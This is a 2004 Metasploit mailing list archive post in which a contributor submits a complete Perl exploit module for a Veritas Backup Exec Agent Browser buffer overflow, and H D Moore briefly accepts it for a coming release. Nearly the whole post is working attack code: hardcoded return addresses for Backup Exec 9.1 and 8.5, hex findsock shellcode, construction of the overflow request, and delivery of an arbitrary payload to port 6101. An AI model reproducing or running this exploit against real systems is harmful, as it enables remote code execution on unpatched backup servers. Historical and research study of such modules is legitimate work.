Metasploit mailing list archives
Veritas Backup Exec Agent Browser Overflow
From: hdm at metasploit.com (H D Moore)
Date: Thu, 16 Dec 2004 15:14:14 -0600
Thanks! We should be able to include this in the 2.3 release (due out sometime early January). -HD On Thursday 16 December 2004 15:10, syscall wrote:
http://www.idefense.com/application/poi/display?id=169 exploit code for veritas buggy. ___________________________________ package Msf::Exploit::backupexec_ns; use base "Msf::Exploit"; use strict; use Pex::Text; # wot is this? my $advanced = { }; # infoz my $info = { 'Name' => 'Veritas Backup Exec Agent Browser Overflow', 'Authors' => [ 'Thor Doomen <syscall at inbox.lv>' ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32' ], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 6101], }, 'Payload' => { 'MinNops' => 0, 'MaxNops' => 0, 'Space' => 1024, 'BadChars' => '', }, 'Description' => Pex::Text::Freeform(qq{ Veritas overflow bug. }), 'Refs' => [ 'http://www.idefense.com/application/poi/display?id=169' ], 'Targets' => [ ['Veritas BE 9.1 ', 0x014476eb, 0x401150FF], # recv at bnetns.exe v9.1.4691.0 | esi at beclass.dll v9.1.4691.0 ['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], # recv at bnetns.exe v8.50.3572 | esi at beclass.dll v8.50.3572 ], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; $self->PrintLine( "[*] Attempting to make exploit target " . $target->[0] ); my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ( $s->IsError ) { $self->PrintLine( '[*] Error creating socket: ' . $s->GetError ); return; } my $code = "\xfc" x 112; # findsock - recv!bnetns.exe (iat) my $read = "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" . "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" . "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75" . "\xe1\xff\xd7"; substr( $read, 29, 4, pack( 'V', $target->[2] ) ); substr( $code, 2, length($read), $read ); substr( $code, 66, 4, pack( 'V', $target->[1] ) ); my $req = "\x02\x00\x32\x00\x20\x00" . $code . "\x00" . "1.1.1.1.1.1\x00" . "\xeb\x81"; $self->PrintLine( "[*] Sending attack of " . length($req) . " bytes..." ); $s->Send($req); $self->PrintLine("[*] Sending the shell code..."); # make socket flush $s->Send( "pPpP" x 128 ); $s->Send($shellcode); $self->PrintLine("[*] Wait for response..."); return; } Advertisement: Skoda Fabia auto bez pirmas iemaksas www.skoda.lv
Current thread:
- Veritas Backup Exec Agent Browser Overflow syscall (Dec 16)
- Veritas Backup Exec Agent Browser Overflow H D Moore (Dec 16)